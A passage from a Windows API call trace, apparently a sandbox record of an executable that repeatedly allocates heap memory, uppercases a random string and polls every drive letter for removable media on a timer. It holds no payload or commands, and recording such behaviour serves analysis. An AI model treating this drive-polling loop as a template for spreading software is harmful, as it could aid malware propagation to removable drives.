hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.221] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.221] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0215.221] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0215.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0215.221] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0215.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.222] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.222] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.222] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.223] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.223] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.223] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.223] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.223] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.223] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.223] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.224] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.224] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.224] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.224] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.224] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.224] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.224] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.225] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.225] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.225] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.225] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.225] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.225] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.226] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.226] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.226] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.226] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.227] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0215.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0215.229] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0215.229] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.229] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.229] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.229] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.229] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0215.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.230] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.230] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.230] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.230] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.317] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.317] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.317] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.318] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.318] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.318] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.318] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.318] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.318] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.318] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.319] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.319] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.319] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.319] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.320] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.320] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.320] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.320] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.320] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.320] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.320] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.321] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.321] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0215.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0215.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.321] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.321] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.322] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.322] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.322] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.322] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0215.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0215.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0215.322] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0215.322] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.323] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.323] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.323] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.323] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.324] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.324] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.366] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.366] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.366] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.366] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.367] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.367] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.367] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.367] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.367] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.367] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.367] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.368] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.368] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.368] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.368] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.368] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.368] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.369] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.369] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.369] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.369] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.369] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.370] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.370] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.370] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0215.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.382] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.383] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.383] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.383] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.383] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.383] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.383] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0215.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0215.384] PeekMessageW 